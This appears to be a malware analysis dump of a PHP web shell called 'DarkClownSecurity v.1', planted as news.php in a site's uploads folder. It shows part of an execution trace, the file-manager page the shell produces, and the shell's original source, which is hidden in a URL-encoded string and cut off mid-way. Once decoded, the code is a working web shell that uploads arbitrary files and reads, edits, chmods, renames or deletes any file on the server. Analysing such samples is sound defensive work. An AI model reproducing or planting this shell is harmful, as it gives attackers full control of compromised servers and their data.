5	48	1	0.002901	494360
5	48	R			33204
4		A						/tmp/0Hi7EU3	264	$perms = 33204
4		A						/tmp/0Hi7EU3	264	$info = '-'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= 'w'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= 'w'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4	47	1	0.003004	494360
4	47	R			'-rw-rw-r--'
4	49	0	0.003017	494320	is_writable	0		/tmp/0Hi7EU3	230	1	'/var/www/html/uploads/news.php'
4	49	1	0.003033	494360
4	49	R			FALSE
4	50	0	0.003046	494320	is_readable	0		/tmp/0Hi7EU3	230	1	'/var/www/html/uploads/news.php'
4	50	1	0.003061	494360
4	50	R			TRUE
4	51	0	0.003074	494328	is_file	0		/tmp/0Hi7EU3	219	1	'/var/www/html/uploads/prepend.php'
4	51	1	0.003089	494376
4	51	R			TRUE
4	52	0	0.003102	494336	filesize	0		/tmp/0Hi7EU3	219	1	'/var/www/html/uploads/prepend.php'
4	52	1	0.003115	494376
4	52	R			57
3		A						/tmp/0Hi7EU3	219	$size = 0.0556640625
4	53	0	0.003138	494232	round	0		/tmp/0Hi7EU3	219	2	0.0556640625	3
4	53	1	0.003150	494304
4	53	R			0.056
3		A						/tmp/0Hi7EU3	219	$size = 0.056
3		A						/tmp/0Hi7EU3	219	$size = '0.056 KB'
4	54	0	0.003183	494336	is_writable	0		/tmp/0Hi7EU3	228	1	'/var/www/html/uploads/prepend.php'
4	54	1	0.003199	494376
4	54	R			FALSE
4	55	0	0.003212	494336	is_readable	0		/tmp/0Hi7EU3	229	1	'/var/www/html/uploads/prepend.php'
4	55	1	0.003227	494376
4	55	R			TRUE
4	56	0	0.003240	494336	perms	1		/tmp/0Hi7EU3	230	1	'/var/www/html/uploads/prepend.php'
5	57	0	0.003253	494336	fileperms	0		/tmp/0Hi7EU3	264	1	'/var/www/html/uploads/prepend.php'
5	57	1	0.003269	494376
5	57	R			33261
4		A						/tmp/0Hi7EU3	264	$perms = 33261
4		A						/tmp/0Hi7EU3	264	$info = '-'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= 'w'
4		A						/tmp/0Hi7EU3	264	$info .= 'x'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4		A						/tmp/0Hi7EU3	264	$info .= 'x'
4		A						/tmp/0Hi7EU3	264	$info .= 'r'
4		A						/tmp/0Hi7EU3	264	$info .= '-'
4		A						/tmp/0Hi7EU3	264	$info .= 'x'
4	56	1	0.003379	494376
4	56	R			'-rwxr-xr-x'
4	58	0	0.003393	494336	is_writable	0		/tmp/0Hi7EU3	230	1	'/var/www/html/uploads/prepend.php'
4	58	1	0.003409	494376
4	58	R			FALSE
4	59	0	0.003423	494336	is_readable	0		/tmp/0Hi7EU3	230	1	'/var/www/html/uploads/prepend.php'
4	59	1	0.003438	494376
4	59	R			TRUE
3	10	1	0.003453	494272
3	60	0	0.003464	451344	unlink	0		/var/www/html/uploads/news.php	11	1	'/tmp/0Hi7EU3'
3	60	1	0.003568	451344
3	60	R			TRUE
3	61	0	0.003585	451304	get_defined_vars	0		/var/www/html/uploads/news.php	12	0
3	61	1	0.003598	452000
3	61	R			['i' => 5, 't' => '/tmp/0Hi7EU3', 'h' => resource(4) of type (Unknown), 'url' => 'news.php', 'path' => '/var/www/html/uploads', 'paths' => [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'], 'pat' => 'uploads', 'id' => 4, 'a' => TRUE, 'scandir' => [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'news.php', 5 => 'prepend.php'], 'dir' => 'prepend.php', 'file' => 'prepend.php', 'size' => '0.056 KB']
2	5	1	0.003637	452000
2	5	R			['i' => 5, 't' => '/tmp/0Hi7EU3', 'h' => resource(4) of type (Unknown), 'url' => 'news.php', 'path' => '/var/www/html/uploads', 'paths' => [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'], 'pat' => 'uploads', 'id' => 4, 'a' => TRUE, 'scandir' => [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'news.php', 5 => 'prepend.php'], 'dir' => 'prepend.php', 'file' => 'prepend.php', 'size' => '0.056 KB']
2	62	0	0.003673	452000	extract	0		/var/www/html/uploads/news.php	14	1	['i' => 5, 't' => '/tmp/0Hi7EU3', 'h' => resource(4) of type (Unknown), 'url' => 'news.php', 'path' => '/var/www/html/uploads', 'paths' => [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'], 'pat' => 'uploads', 'id' => 4, 'a' => TRUE, 'scandir' => [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'news.php', 5 => 'prepend.php'], 'dir' => 'prepend.php', 'file' => 'prepend.php', 'size' => '0.056 KB']
2	62	1	0.003705	431552
2	62	R			13
1	3	1	0.003719	430824
			0.003749	329480
TRACE END   [2023-02-13 00:01:04.551072]

Generated HTML code
<html lang="en-US"><head>
			 <meta charset="utf-8">
			 <meta name="viewport" content="width=device-width">
			 
				<title>DarkClownSecurity v.1</title>
				<link rel="icon" href="//i.postimg.cc/CL3wFSrQ/rsz-index-1.png">
				<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type="text/css">
				<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/MKY.css" type="text/css">
				
		 </head>
		 
		 <body>
			 <h1>
				<center>
					<a href="news.php">DarkClownSecurity v.1<br><img width="300" height="250" src="https://1.bp.blogspot.com/-w6rsqSSKX4E/XVE88z_sBVI/AAAAAAAAEHo/gHbDiWE98wEmfhm4wugU_-F_VZoogV4SACEwYBhgL/s320/dfe21829-f06a-4ebd-8981-d77782bd1614.jpg"></a>
				</center>
			 </h1>
			 
			 <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
				<tbody><tr>
					<td>
						Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64						
						<br>

						<a class="wrn" href="?path=/">/</a>							
						<a class="wrn" href="?path=/var">var</a>/							
						<a class="wrn" href="?path=/var/www">www</a>/							
						<a class="wrn" href="?path=/var/www/html">html</a>/
					</td>
				</tr>

				<tr>
					<td>
						<form enctype="multipart/form-data" method="POST">
							<input type="file" name="file">
							<input type="submit" value=">>">
						</form>
					</td>
				</tr>
			 </tbody></table>
		 
			 <br>
		 
			 <center></center>

			 <div id="content">
				<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
					<tbody><tr class="first">
						<td>
							<center>Name</center>
						</td>
						<td>
							<center>Size</center>
						</td>
						<td>
							<center>Permissions</center>
						</td>
						<td>
							<center>Options</center>
						</td>
					</tr>
					

					<tr class="first">
						<td></td>
						<td></td>
						<td></td>
						<td></td>
					</tr>
					<tr>
						<td>
							<a class="wrn" href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a>
						</td>
						
						<td>
							<center>0 KB</center>
						</td>
						<td>
							<center>-rw-r--r--
							</center>
						</td>
						<td>
							<center>
								<form method="POST" action="?option&amp;path=/var/www/html">
								
									<select name="opt">
										<option value=""></option>
										<option value="delete">Delete</option>
										<option value="chmod">Chmod</option>
										<option value="rename">Rename</option>
										<option value="edit">Edit</option>
									</select>
									
									<input type="hidden" name="type" value="file">
									<input type="hidden" name="name" value="beneri.se_malware_analysis">
									<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
									<input type="submit" value=">>">
								</form>
							</center>
						</td>
					</tr>					<tr>
						<td>
							<a class="wrn" href="?filesrc=/var/www/html/news.php&amp;path=/var/www/html">news.php</a>
						</td>
						
						<td>
							<center>17.042 KB</center>
						</td>
						<td>
							<center>-rw-rw-r--
							</center>
						</td>
						<td>
							<center>
								<form method="POST" action="?option&amp;path=/var/www/html">
								
									<select name="opt">
										<option value=""></option>
										<option value="delete">Delete</option>
										<option value="chmod">Chmod</option>
										<option value="rename">Rename</option>
										<option value="edit">Edit</option>
									</select>
									
									<input type="hidden" name="type" value="file">
									<input type="hidden" name="name" value="news.php">
									<input type="hidden" name="path" value="/var/www/html/news.php">
									<input type="submit" value=">>">
								</form>
							</center>
						</td>
					</tr>
				</tbody></table>
			</div>

			<br>
			
			<div class="footer">Hit me [at] <font color="red">zhieend@gmail.com</font></div>
		
		

	</body></html>
Original PHP code
 <?php
   $i = rawurldecode("%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en-US%22%3E%0A%0A%09%09%20%3Chead%3E%0A%09%09%09%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%09%09%09%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%09%09%09%20%0A%09%09%09%09%3Ctitle%3EDarkClownSecurity%20v.1%3C%2Ftitle%3E%0A%09%09%09%09%3Clink%20rel%3D%22icon%22%20href%3D%22%2F%2Fi.postimg.cc%2FCL3wFSrQ%2Frsz-index-1.png%22%20%2F%3E%0A%09%09%09%09%3Clink%20rel%3D%22stylesheet%22%20href%3D%22%2F%2Ffonts.googleapis.com%2Fcss%3Ffamily%3DBerkshire%2BSwash%22%20type%3D%22text%2Fcss%22%3E%0A%09%09%09%09%3Clink%20rel%3D%22stylesheet%22%20href%3D%22%2F%2F0x5a455553.github.io%2FMARIJUANA%2FMKY.css%22%20type%3D%22text%2Fcss%22%3E%0A%09%09%09%09%0A%09%09%20%3C%2Fhead%3E%0A%09%09%20%0A%09%09%20%3Cbody%3E%0A%09%09%09%20%3Ch1%3E%0A%09%09%09%09%3Ccenter%3E%0A%09%09%09%09%09%3Ca%20href%3D%22%3C%3Fphp%20%24url%3Dbasename%28%24_SERVER%5B%27PHP_SELF%27%5D%29%3Becho%20%24url%3B%3F%3E%22%3EDarkClownSecurity%20v.1%3c%62%72%3e%3c%69%6d%67%20%77%69%64%74%68%3d%22%33%30%30%22%20%68%65%69%67%68%74%3d%22%32%35%30%22%20%73%72%63%3d%22https://1.bp.blogspot.com/-w6rsqSSKX4E/XVE88z_sBVI/AAAAAAAAEHo/gHbDiWE98wEmfhm4wugU_-F_VZoogV4SACEwYBhgL/s320/dfe21829-f06a-4ebd-8981-d77782bd1614.jpg%22%3e%3C%2Fa%3E%0A%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%20%3C%2Fh1%3E%0A%09%09%09%20%0A%09%09%09%20%3Ctable%20width%3D%22700%22%20border%3D%220%22%20cellpadding%3D%223%22%20cellspacing%3D%221%22%20align%3D%22center%22%3E%0A%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%3C%3Fphp%20echo%20php_uname%28%29%3B%3F%3E%0A%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Cbr%3E%0A%3C%3Fphp%0A%20if%28isset%28%24_GET%5B%27path%27%5D%29%29%7B%24path%3D%24_GET%5B%27path%27%5D%3B%7Delse%20%7B%24path%3Dgetcwd%28%29%3B%7D%24path%3Dstr_replace%28%27%5C%5C%27%2C%27%2F%27%2C%24path%29%3B%24paths%3Dexplode%28%27%2F%27%2C%24path%29%3Bforeach%28%24paths%20as%20%24id%3D%3E%24pat%29%7Bif%28%24pat%3D%3D%27%27%26%26%24id%3D%3D0%29%7B%24a%3Dtrue%3Becho%20%27%0A%09%09%09%09%09%09%3Ca%20class%3D%22wrn%22%20href%3D%22%3Fpath%3D%2F%22%3E%2F%3C%2Fa%3E%27%3Bcontinue%3B%7Dif%28%24pat%3D%3D%27%27%29continue%3Becho%20%27%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Ca%20class%3D%22wrn%22%20href%3D%22%3Fpath%3D%27%3Bfor%28%24i%3D0%3B%24i%3C%3D%24id%3B%24i%2B%2B%29%7Becho%20%22%24paths%5B%24i%5D%22%3Bif%28%24i%21%3D%24id%29echo%20%22%2F%22%3B%7Decho%20%27%22%3E%27.%24pat.%27%3C%2Fa%3E%2F%27%3B%7Decho%20%27%0A%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%3C%2Ftr%3E%0A%0A%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%3Ctd%3E%27%3Bif%28isset%28%24_FILES%5B%27file%27%5D%29%29%7Bif%28copy%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%24path.%27%2F%27.%24_FILES%5B%27file%27%5D%5B%27name%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Cbr%3E%0A%09%09%09%09%09%09%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Cbr%3E%0A%09%09%09%09%09%09%27%3B%7D%7D%3F%3E%0A%0A%09%09%09%09%09%09%3Cform%20enctype%3D%22multipart%2Fform-data%22%20method%3D%22POST%22%3E%0A%09%09%09%09%09%09%09%3Cinput%20type%3D%22file%22%20name%3D%22file%22%20%2F%3E%0A%09%09%09%09%09%09%09%3Cinput%20type%3D%22submit%22%20value%3D%22%3E%3E%22%20%2F%3E%0A%09%09%09%09%09%09%3C%2Fform%3E%0A%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%3C%2Ftr%3E%0A%3C%3Fphp%0A%20if%28isset%28%24_GET%5B%27filesrc%27%5D%29%29%7Becho%20%22%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%0A%09%09%09%09%09%3Cbr%3E%0A%09%09%09%09%09%0A%09%09%09%09%09%3Ccenter%3E%0A%09%09%09%09%09%22%3Becho%20%22%3Cfont%20color%3D%5C%22%2300FF66%20%5C%22%3E%22.%24_GET%5B%27filesrc%27%5D.%22%3C%2Ffont%3E%22%3Becho%20%27%0A%09%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%3C%2Ftr%3E%0A%09%09%09%3C%2Ftable%3E%0A%09%09%09%0A%09%09%09%3Cbr%3E%27%3Becho%28%27%0A%09%09%09%0A%09%09%09%3Cpre%3E%0A%27.htmlspecialchars%28file_get_contents%28%24_GET%5B%27filesrc%27%5D%29%29.%27%09%09%09%0A%09%09%09%3C%2Fpre%3E%27%29%3B%7Delseif%28isset%28%24_GET%5B%27option%27%5D%29%26%26%24_POST%5B%27opt%27%5D%21%3D%27delete%27%29%7Becho%20%27%09%09%09%09%3C%2Ftable%3E%0A%09%09%20%0A%09%09%09%09%3Cbr%3E%0A%09%09%20%0A%09%09%09%09%3Ccenter%3E%27.%24_POST%5B%27path%27%5D.%27%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%0A%09%09%09%09%3Cbr%3E%27%3Bif%28%24_POST%5B%27opt%27%5D%3D%3D%27chmod%27%29%7Bif%28isset%28%24_POST%5B%27perm%27%5D%29%29%7Bif%28chmod%28%24_POST%5B%27path%27%5D%2C%24_POST%5B%27perm%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7D%7D%3F%3E%0A%0A%0A%09%09%09%09%3Cform%20method%3D%22POST%22%3E%0A%09%09%09%09%09Permission%20%3A%20%0A%09%09%09%09%09%3Cinput%20name%3D%22perm%22%20type%3D%22text%22%20size%3D%224%22%20value%3D%22%3C%3Fphp%20echo%20substr%28sprintf%28%27%25o%27%2Cfileperms%28%24_POST%5B%27path%27%5D%29%29%2C-4%29%3B%3F%3E%22%20%2F%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22path%22%20value%3D%22%3C%3Fphp%20echo%20%24_POST%5B%27path%27%5D%3B%3F%3E%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22opt%22%20value%3D%22chmod%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22submit%22%20value%3D%22%3E%3E%22%20%2F%3E%0A%09%09%09%09%3C%2Fform%3E%0A%3C%3Fphp%0A%20%7Delseif%28%24_POST%5B%27opt%27%5D%3D%3D%27rename%27%29%7Bif%28isset%28%24_POST%5B%27newname%27%5D%29%29%7Bif%28rename%28%24_POST%5B%27path%27%5D%2C%24path.%27%2F%27.%24_POST%5B%27newname%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7D%24_POST%5B%27name%27%5D%3D%24_POST%5B%27newname%27%5D%3B%7D%3F%3E%0A%0A%0A%09%09%09%09%3Cform%20method%3D%22POST%22%3E%0A%09%09%09%09%09New%20Name%20%3A%20%0A%09%09%09%09%09%3Cinput%20name%3D%22newname%22%20type%3D%22text%22%20size%3D%2220%22%20value%3D%22%3C%3Fphp%20echo%20%24_POST%5B%27name%27%5D%3B%3F%3E%22%20%2F%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22path%22%20value%3D%22%3C%3Fphp%20echo%20%24_POST%5B%27path%27%5D%3B%3F%3E%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22opt%22%20value%3D%22rename%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22submit%22%20value%3D%22%3E%3E%22%20%2F%3E%0A%09%09%09%09%3C%2Fform%3E%0A%3C%3Fphp%0A%20%7Delseif%28%24_POST%5B%27opt%27%5D%3D%3D%27edit%27%29%7Bif%28isset%28%24_POST%5B%27src%27%5D%29%29%7B%24fp%3Dfopen%28%24_POST%5B%27path%27%5D%2C%27w%27%29%3Bif%28fwrite%28%24fp%2C%24_POST%5B%27src%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Dfclose%28%24fp%29%3B%7D%3F%3E%0A%0A%0A%09%09%09%09%3Cform%20method%3D%22POST%22%3E%0A%09%09%09%09%0A%09%09%09%09%09%3Ctextarea%20cols%3D80%20rows%3D20%20name%3D%22src%22%3E%0A%3C%3Fphp%20echo%20htmlspecialchars%28file_get_contents%28%24_POST%5B%27path%27%5D%29%29%3B%3F%3E%0A%3C%2Ftextarea%3E%0A%09%09%09%09%09%0A%09%09%09%09%09%3Cbr%3E%0A%09%09%09%09%09%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22path%22%20value%3D%22%3C%3Fphp%20echo%20%24_POST%5B%27path%27%5D%3B%3F%3E%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22opt%22%20value%3D%22edit%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22submit%22%20value%3D%22%3E%3E%22%20%2F%3E%0A%09%09%09%09%3C%2Fform%3E%0A%3C%3Fphp%0A%20%7Decho%20%27%09%09%09%09%3C%2Fcenter%3E%27%3B%7Delse%7Becho%20%27%09%09%09%20%3C%2Ftable%3E%0A%09%09%20%0A%09%09%09%20%3Cbr%3E%0A%09%09%20%0A%09%09%09%20%3Ccenter%3E%27%3Bif%28isset%28%24_GET%5B%27option%27%5D%29%26%26%24_POST%5B%27opt%27%5D%3D%3D%27delete%27%29%7Bif%28%24_POST%5B%27type%27%5D%3D%3D%27dir%27%29%7Bif%28rmdir%28%24_POST%5B%27path%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7D%7Delseif%28%24_POST%5B%27type%27%5D%3D%3D%27file%27%29%7Bif%28unlink%28%24_POST%5B%27path%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7D%7D%7Decho%20%27%3C%2Fcenter%3E%27%3B%24scandir%3Dscandir%28%24path%29%3B%3F%3E%0A%0A%0A%09%09%09%20%3Cdiv%20id%3D%22content%22%3E%0A%09%09%09%09%3Ctable%20width%3D%22700%22%20border%3D%220%22%20cellpadding%3D%223%22%20cellspacing%3D%221%22%20align%3D%22center%22%3E%0A%09%09%09%09%09%3Ctr%20class%3D%22first%22%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3EName%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3ESize%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3EPermissions%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3EOptions%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%3C%2Ftr%3E%0A%09%09%09%09%09%0A%3C%3Fphp%0A%20foreach%28%24scandir%20as%20%24dir%29%7Bif%28%21is_dir%28%22%24path%2F%24dir%22%29%7C%7C%24dir%3D%3D%27.%27%7C%7C%24dir%3D%3D%27..%27%29continue%3Becho%20%22%09%09%09%09%09%0A%09%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ca%20class%3D%5C%22wrn%5C%22%20href%3D%5C%22%3Fpath%3D%24path%2F%24dir%5C%22%3E%24dir%3C%2Fa%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E--%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%22%3Bif%28is_writable%28%22%24path%2F%24dir%22%29%29echo%20%27%3Cfont%20color%3D%22%2300BB00%22%3E%27%3Belseif%28%21is_readable%28%22%24path%2F%24dir%22%29%29echo%20%27%3Cfont%20color%3D%22red%22%3E%27%3Becho%20perms%28%22%24path%2F%24dir%22%29%3Bif%28is_writable%28%22%24path%2F%24dir%22%29%7C%7C%21is_readable%28%22%24path%2F%24dir%22%29%29echo%20%27%3C%2Ffont%3E%27%3Becho%20%22%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%0A%09%09%09%09%09%09%09%09%3Cform%20method%3D%5C%22POST%5C%22%20action%3D%5C%22%3Foption%26path%3D%24path%5C%22%3E%0A%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%3Cselect%20name%3D%5C%22opt%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22%5C%22%3E%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22delete%5C%22%3EDelete%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22chmod%5C%22%3EChmod%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22rename%5C%22%3ERename%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%3C%2Fselect%3E%0A%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22type%5C%22%20value%3D%5C%22dir%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22name%5C%22%20value%3D%5C%22%24dir%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22path%5C%22%20value%3D%5C%22%24path%2F%24dir%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22submit%5C%22%20value%3D%5C%22%3E%3E%5C%22%20%2F%3E%0A%09%09%09%09%09%09%09%09%3C%2Fform%3E%0A%09%09%09%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%3C%2Ftr%3E%22%3B%7D%3F%3E%0A%0A%09%09%09%09%09%3Ctr%20class%3D%22first%22%3E%0A%09%09%09%09%09%09%3Ctd%3E%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%3C%2Ftd%3E%0A%09%09%09%09%09%3C%2Ftr%3E%0A%3C%3Fphp%0A%20foreach%28%24scandir%20as%20%24file%29%7Bif%28%21is_file%28%22%24path%2F%24file%22%29%29continue%3B%24size%3Dfilesize%28%22%24path%2F%24file%22%29%2F1024%3B%24size%3Dround%28%24size%2C3%29%3Bif%28%24size%3E%3D1024%29%7B%24size%3Dround%28%24size%2F1024%2C2%29.%27%20MB%27%3B%7Delse%7B%24size%3D%24size.%27%20KB%27%3B%7Decho%20%22%09%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ca%20class%3D%5C%22wrn%5C%22%20href%3D%5C%22%3Ffilesrc%3D%24path%2F%24file%26path%3D%24path%5C%22%3E%24file%3C%2Fa%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%22.%24size.%22%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%22%3Bif%28is_writable%28%22%24path%2F%24file%22%29%29echo%20%27%0A%09%09%09%09%09%09%09%09%3Cfont%20color%3D%22%2300BB00%22%3E%27%3Belseif%28%21is_readable%28%22%24path%2F%24file%22%29%29echo%20%27%0A%09%09%09%09%09%09%09%09%3Cfont%20color%3D%22red%22%3E%27%3Becho%20perms%28%22%24path%2F%24file%22%29%3Bif%28is_writable%28%22%24path%2F%24file%22%29%7C%7C%21is_readable%28%22%24path%2F%24file%22%29%29echo%20%27%3C%2Ffont%3E%27%3Becho%20%22%0A%09%09%09%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%0A%09%09%09%09%09%09%09%09%3Cform%20method%3D%5C%22POST%5C%22%20action%3D%5C%22%3Foption%26path%3D%24path%5C%22%3E%0A%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%3Cselect%20name%3D%5C%22opt%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22%5C%22%3E%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22delete%5C%22%3EDelete%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22chmod%5C%22%3EChmod%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%